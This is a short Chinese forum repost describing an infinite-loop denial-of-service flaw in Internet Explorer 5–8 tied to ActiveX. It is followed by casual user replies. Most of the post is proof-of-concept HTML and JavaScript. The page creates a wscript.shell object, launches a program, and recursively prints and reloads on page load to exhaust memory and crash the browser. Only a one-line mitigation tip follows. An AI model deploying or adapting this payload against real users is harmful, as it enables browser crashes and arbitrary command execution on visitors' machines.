Internet Explorer 无限循环拒绝服务漏洞

SiMen.K.

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问，恶意代码可运行任何Windows命令，消耗大量内存，导致访问者IE浏览器崩溃。
测试代码

1. 
   
2. <html>
   
3. <title>cnhackerx@163.com</title>
   
4. <head>
   
5. <script type="text/javascript">
   
6. function sucks()
   
7. {
   
8. var shell=new ActiveXObject("wscript.shell");
   
9. shell.Run("calc", 1);
   
10. }
    
11. function asheesh()
    
12. {
    
13. sucks();
    
14. window.onerror=new Function("history.go(0)");
    
15. window.print();
    
16. asheesh();
    
17. }
    
18. asheesh();
    
19. </script>
    
20. </head>
    
21. <body onLoad="asheesh()"></body>
    
22. </html>
    

复制代码

影响版本
Internet Explorer 5，6，7，8

安全建议
禁止ActiveX控件自动运行.不要手工运行该类控件运行。

[以上来自互联网]

Jackey.lia

红客强势插入

MaMaMiYa

偶尔用用IE,没有此类问题

Miracle.jack

一般都用360~ 免的有些网页有毒，到时后果就严重了

czcxw

楼上 经常看XX？

yanjunan

360用的IE内核